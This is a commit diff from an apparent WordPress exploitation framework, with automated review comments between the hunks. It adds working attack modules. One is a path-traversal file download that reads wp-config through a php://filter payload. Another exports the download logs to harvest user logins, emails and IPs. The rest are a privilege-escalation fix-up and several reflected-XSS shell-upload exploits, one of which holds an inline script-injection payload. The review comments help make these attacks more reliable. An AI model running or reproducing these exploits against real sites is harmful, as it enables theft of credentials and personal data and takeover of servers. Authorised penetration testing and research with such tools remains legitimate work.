
Commit fc6d150

Merge branch 'development'
2 parents f9524e0 + 6b69473 commit fc6d150

74 files changed

+1608
-13
lines changed


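--- a/.gitignore
+++ b/.gitignore
@@ -103,3 +103,6 @@ typings/
 # Compiled Angular TypeScript
 lib/web/public/app/**/*.js
 lib/web/public/app/**/*.map
+
+# SQLite databases
+db/*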

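--- a/Gemfile
+++ b/Gemfile
@@ -4,7 +4,7 @@ gem 'mime-types', '>=3.1'
 gem 'nokogiri', '~>1.7.0'
 gem 'require_all', '~>1.4'
 gem 'rubyzip', '~>1.2'
-gem 'slop', '~>4.4.1'
+gem 'slop', '~>4.5'
 gem 'typhoeus', '~>1.1.2'
 
 group :test do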

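--- a/lib/wpxf/net/http_client.rb
+++ b/lib/wpxf/net/http_client.rb
@@ -14,6 +14,8 @@ def initialize
 
 initialize_options
 initialize_advanced_options
+
+@hydra = Typhoeus::Hydra.new(max_concurrency: max_http_concurrency)
 end
 
 # Initialize the basic HTTP options for the module.
@@ -106,6 +108,7 @@ def queue_request(opts, &callback)
 end
 
 @hydra.queue req
+@hydra.queued_requests
 end
 
 # Execute multiple HTTP requests in parallel queued by {#queue_request}.
@@ -179,13 +182,6 @@ def execute_delete_request(opts)
 def max_http_concurrency
 normalized_option_value('max_http_concurrency')
 end
-
-# Run the module.
-# @return [Boolean] true if the module was successful.
-def run
-super
-@hydra = Typhoeus::Hydra.new(max_concurrency: max_http_concurrency)
-end
 end
 end
 end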
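Review bot: Moving the Hydra construction into `initialize` (first hunk) fixes the concurrency to whatever `max_http_concurrency` returns at module load, so a user who sets that option after the module is created gets the old limit silently; the removed `run` override in the third hunk was what picked up the new value. Unless the part of the file not shown here rebuilds `@hydra` before the queued requests are executed, either recreate it in the method that runs the queue (`@hydra = Typhoeus::Hydra.new(max_concurrency: max_http_concurrency)` immediately before `@hydra.run`, if that is where it runs — not visible in this hunk) or document the constraint on the option with `# NOTE: read once in initialize; changing max_http_concurrency later does not resize @hydra`. The second hunk also changes what `queue_request` returns (now `@hydra.queued_requests`); its YARD block starts before the hunk and should gain `# @return [Array] the requests currently queued on the hydra`.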

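--- a/lib/wpxf/wordpress/login.rb
+++ b/lib/wpxf/wordpress/login.rb
@@ -44,11 +44,13 @@ def wordpress_login(user, pass)
 end
 
 private def execute_wp_login_request(user, pass)
+res = nil
 scoped_option_change('follow_http_redirection', false) do
-return execute_post_request(
+res = execute_post_request(
 url: wordpress_url_login,
 body: wordpress_login_post_body(user, pass)
 )
 end
+res
 end
 end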
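Review bot: Removing the `return` from inside the `scoped_option_change` block only covers the normal path; if `execute_post_request` raises, the block is still left early and `follow_http_redirection` stays disabled for later requests unless `scoped_option_change` restores the option in an `ensure` (its definition is not in this commit, so worth confirming). The same construct is introduced in `modules/auxiliary/download_manager_authenticated_privilege_escalation.rb` in this commit and has the same dependency. If `scoped_option_change` yields the block's value back, the `res = nil` / `res` scaffolding can go and the block can simply be the method's last expression, `scoped_option_change('follow_http_redirection', false) { execute_post_request(url: wordpress_url_login, body: wordpress_login_post_body(user, pass)) }`.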
Lines changed: 55 additions & 0 deletions
@@ -0,0 +1,55 @@
1+
class Wpxf::Auxiliary::AdWidgetPhpFileDownload < Wpxf::Module
2+
include Wpxf::WordPress::FileDownload
3+
4+
def initialize
5+
super
6+
7+
update_info(
8+
name: 'Ad-Widget <= 2.11.0 Authenticated PHP File Download',
9+
author: [
10+
'Rob Carr <rob[at]rastating.com>' # WPXF module
11+
],
12+
references: [
13+
['WPVDB', '8789']
14+
],
15+
date: 'Apr 04 2017'
16+
)
17+
end
18+
19+
def check
20+
check_plugin_version_from_readme('ad-widget', '2.12.0')
21+
end
22+
23+
def requires_authentication
24+
true
25+
end
26+
27+
def default_remote_file_path
28+
'../wp-config'
29+
end
30+
31+
def working_directory
32+
'wp-admin/'
33+
end
34+
35+
def downloader_url
36+
normalize_uri(wordpress_url_plugins, 'ad-widget', 'views', 'modal', 'index.php')
37+
end
38+
39+
def validate_result(res)
40+
return false unless super(res)
41+
42+
if export_path.nil?
43+
res.body = Base64.decode64(res.body)
44+
else
45+
content = Base64.decode64(File.read(export_path))
46+
File.open(export_path, 'wb') { |f| f.write(content) }
47+
end
48+
49+
true
50+
end
51+
52+
def download_request_params
53+
{ 'step' => "php://filter/convert.base64-encode/resource=#{remote_file}" }
54+
end
55+
end
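Review bot: `validate_result` (lines 39-50 of the new file) decodes with `Base64.decode64`, which never raises: a response that is not base64 at all — an HTML error page or a login redirect that still passed `super` — is decoded to garbage and the method still returns `true`, so the module reports success and, in the `export_path` branch, overwrites the downloaded file with that garbage. Using `Base64.strict_decode64` and treating `ArgumentError` as a failed validation makes the failure visible. `Base64` is also not required in this file; it may be loaded by the framework elsewhere, but `require 'base64'` at the top is cheap insurance. The file section header is hidden on this page, so the path is not visible here.
```ruby
def validate_result(res)
  return false unless super(res)

  begin
    if export_path.nil?
      res.body = Base64.strict_decode64(res.body)
    else
      content = Base64.strict_decode64(File.read(export_path))
      File.open(export_path, 'wb') { |f| f.write(content) }
    end
  rescue ArgumentError
    # Response was not a base64 stream, so this is not the requested file.
    emit_error 'Response was not valid base64 encoded content'
    return false
  end

  true
end
```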

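--- a/modules/auxiliary/download_manager_authenticated_privilege_escalation.rb
+++ b/modules/auxiliary/download_manager_authenticated_privilege_escalation.rb
@@ -66,6 +66,7 @@ def run
 'payment_account' => '0'
 }
 
+mod_result = true
 scoped_option_change('follow_http_redirection', false) do
 res = execute_post_request(
 url: full_uri,
@@ -77,10 +78,10 @@ def run
 emit_success "User #{username} now has full admin rights"
 else
 emit_error 'Failed to escalate privileges'
-return false
+mod_result = false
 end
 end
 
-return true
+mod_result
 end
 end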
Lines changed: 122 additions & 0 deletions
@@ -0,0 +1,122 @@
1+
require 'csv'
2+
3+
class Wpxf::Auxiliary::DownloadMonitorLogExport < Wpxf::Module
4+
include Wpxf
5+
6+
def initialize
7+
super
8+
9+
update_info(
10+
name: 'Download Monitor <= 1.9.6 Log Export',
11+
desc: %(
12+
This module allows a user of any level to export a CSV of the download logs, which
13+
includes: Download ID, Version ID, Filename, User ID, User Login, User Email, User IP, User Agent, Date, Status
14+
),
15+
author: [
16+
'James Golovich', # Disclosure
17+
'Rob Carr <rob[at]rastating.com>' # WPXF module
18+
],
19+
references: [
20+
['WPVDB', '8810']
21+
],
22+
date: 'May 05 2017'
23+
)
24+
25+
register_options([
26+
StringOption.new(
27+
name: 'export_path',
28+
desc: 'The file to save the export to',
29+
required: true
30+
)
31+
])
32+
end
33+
34+
def check
35+
check_plugin_version_from_readme('download-monitor', '1.9.7')
36+
end
37+
38+
def requires_authentication
39+
true
40+
end
41+
42+
def export_path
43+
return nil if normalized_option_value('export_path').nil?
44+
File.expand_path normalized_option_value('export_path')
45+
end
46+
47+
def process_row(row)
48+
return unless row[:user_login] && row[:user_email]
49+
emit_success "Found user: #{row[:user_login]} (#{row[:user_email]})", true
50+
@users.push(id: row[:user_login], email: row[:user_email], ip: row[:user_ip])
51+
end
52+
53+
def parse_csv(body, delimiter)
54+
begin
55+
CSV::Converters[:blank_to_nil] = lambda do |field|
56+
field && field.empty? ? nil : field
57+
end
58+
csv = CSV.new(
59+
body,
60+
col_sep: delimiter,
61+
headers: true,
62+
header_converters: :symbol,
63+
converters: [:all, :blank_to_nil]
64+
)
65+
66+
csv.to_a.map { |row| process_row(row) }
67+
return true
68+
rescue
69+
return false
70+
end
71+
end
72+
73+
def execute_download_log_export
74+
res = execute_get_request(
75+
url: wordpress_url_admin,
76+
params: { 'dlm_download_logs' => 'true' },
77+
cookie: session_cookie
78+
)
79+
80+
if res.nil?
81+
emit_error 'No response from the target'
82+
return false
83+
end
84+
85+
if res.code != 200
86+
emit_error "Server responded with code #{res.code}"
87+
return false
88+
end
89+
90+
res
91+
end
92+
93+
def parse_and_display(content)
94+
@users = [{
95+
id: 'Username', email: 'E-mail', ip: 'IP Address'
96+
}]
97+
98+
unless parse_csv(content, ',') || parse_csv(content, ';')
99+
emit_error 'Failed to parse response, the CSV was invalid'
100+
emit_info "CSV content: #{content}", true
101+
return false
102+
end
103+
104+
emit_table @users
105+
end
106+
107+
def run
108+
return false unless super
109+
110+
emit_info 'Requesting download logs...'
111+
res = execute_download_log_export
112+
113+
emit_info 'Parsing response...'
114+
parse_and_display(res.body)
115+
116+
emit_info 'Saving export...'
117+
File.open(export_path, 'w') { |file| file.write(res.body) }
118+
emit_success "Saved export to #{export_path}"
119+
120+
true
121+
end
122+
end
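Review bot: `run` (lines 107-121 of the new file) passes `res.body` to `parse_and_display` without checking `res`, but `execute_download_log_export` returns `false` on a nil response or a non-200 code (lines 80-88), so those paths end in a `NoMethodError` on `false` rather than the clean failure the emitted error messages suggest; add `return false unless res` directly after `res = execute_download_log_export`. The same applies to the `File.open(export_path, 'w')` write further down, which would also receive `res.body`. Separately, `parse_csv` re-registers the process-wide `CSV::Converters[:blank_to_nil]` on every call and its bare `rescue` discards the parse error, so the user only ever sees "the CSV was invalid"; registering the converter once at class load and emitting `e.message` in the verbose output (`rescue => e`) would keep the diagnostics. The file section header is hidden on this page, so the path is not visible here.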
Lines changed: 17 additions & 0 deletions
@@ -0,0 +1,17 @@
1+
class Wpxf::Exploit::AdsensePluginReflectedXssShellUpload < Wpxf::Exploit::BwsPanelReflectedXssShellUpload
2+
def initialize
3+
super
4+
5+
update_info(
6+
name: 'Google AdSense <= 1.43 Reflected XSS Shell Upload'
7+
)
8+
end
9+
10+
def plugin_name
11+
'adsense-plugin'
12+
end
13+
14+
def fixed_version
15+
'1.44'
16+
end
17+
end
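Review bot: `update_info` here only sets `name`, so `author`, `references` and `date` for this module presumably come from `Wpxf::Exploit::BwsPanelReflectedXssShellUpload` (not part of this commit view) and would describe the base module rather than the advisory for this specific plugin. Each subclass should carry its own metadata, e.g. `references: [['WPVDB', '<advisory id — to be filled in>']]` and a `date:`, so the listing a user sees for this module is accurate. The same applies to the Featured Posts, Google Analytics, Google Maps and Latest Posts modules added further down in this commit. The file section header is hidden on this page, so the path is not visible here.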
Lines changed: 39 additions & 0 deletions
@@ -0,0 +1,39 @@
1+
class Wpxf::Exploit::AnswerMyQuestionReflectedXssShellUpload < Wpxf::Module
2+
include Wpxf::WordPress::StagedReflectedXss
3+
4+
def initialize
5+
super
6+
7+
update_info(
8+
name: 'Answer My Question <= 1.3 Reflected XSS Shell Upload',
9+
author: [
10+
'Rob Carr <rob[at]rastating.com>' # WPXF module
11+
],
12+
references: [
13+
['WPVDB', '8800']
14+
],
15+
date: 'Apr 24 2017'
16+
)
17+
end
18+
19+
def check
20+
check_plugin_version_from_changelog('answer-my-question', 'readme.txt', '1.4')
21+
end
22+
23+
def vulnerable_url
24+
normalize_uri(wordpress_url_plugins, 'answer-my-question', 'modal.php')
25+
end
26+
27+
def initial_script
28+
create_basic_post_script(
29+
vulnerable_url,
30+
'id' => "\\\"><script>#{xss_ascii_encoded_include_script}<\\/script>",
31+
'posted' => '1',
32+
'notify' => '',
33+
'user_email' => Utility::Text.rand_email,
34+
'subject' => Utility::Text.rand_alpha(10),
35+
'question' => Utility::Text.rand_alpha(10),
36+
'answer' => Utility::Text.rand_alpha(10)
37+
)
38+
end
39+
end
Lines changed: 18 additions & 0 deletions
@@ -0,0 +1,18 @@
1+
2+
class Wpxf::Exploit::FeaturedPostsReflectedXssShellUpload < Wpxf::Exploit::BwsPanelReflectedXssShellUpload
3+
def initialize
4+
super
5+
6+
update_info(
7+
name: 'Featured Posts <= 1.0.0 Reflected XSS Shell Upload'
8+
)
9+
end
10+
11+
def plugin_name
12+
'bws-featured-posts'
13+
end
14+
15+
def fixed_version
16+
'1.0.0.1'
17+
end
18+
end
Lines changed: 18 additions & 0 deletions
@@ -0,0 +1,18 @@
1+
2+
class Wpxf::Exploit::GoogleAnalyticsReflectedXssShellUpload < Wpxf::Exploit::BwsPanelReflectedXssShellUpload
3+
def initialize
4+
super
5+
6+
update_info(
7+
name: 'Google Analytics <= 1.7.0 Reflected XSS Shell Upload'
8+
)
9+
end
10+
11+
def plugin_name
12+
'bws-google-analytics'
13+
end
14+
15+
def fixed_version
16+
'1.7.0.1'
17+
end
18+
end
Lines changed: 18 additions & 0 deletions
@@ -0,0 +1,18 @@
1+
2+
class Wpxf::Exploit::BwsGoogleMapsReflectedXssShellUpload < Wpxf::Exploit::BwsPanelReflectedXssShellUpload
3+
def initialize
4+
super
5+
6+
update_info(
7+
name: 'Google Maps <= 1.3.5 Reflected XSS Shell Upload'
8+
)
9+
end
10+
11+
def plugin_name
12+
'bws-google-maps'
13+
end
14+
15+
def fixed_version
16+
'1.3.5.1'
17+
end
18+
end
Lines changed: 18 additions & 0 deletions
@@ -0,0 +1,18 @@
1+
2+
class Wpxf::Exploit::LatestPostsReflectedXssShellUpload < Wpxf::Exploit::BwsPanelReflectedXssShellUpload
3+
def initialize
4+
super
5+
6+
update_info(
7+
name: 'Latest Posts <= 0.2 Reflected XSS Shell Upload'
8+
)
9+
end
10+
11+
def plugin_name
12+
'bws-latest-posts'
13+
end
14+
15+
def fixed_version
16+
'0.2.1'
17+
end
18+
end
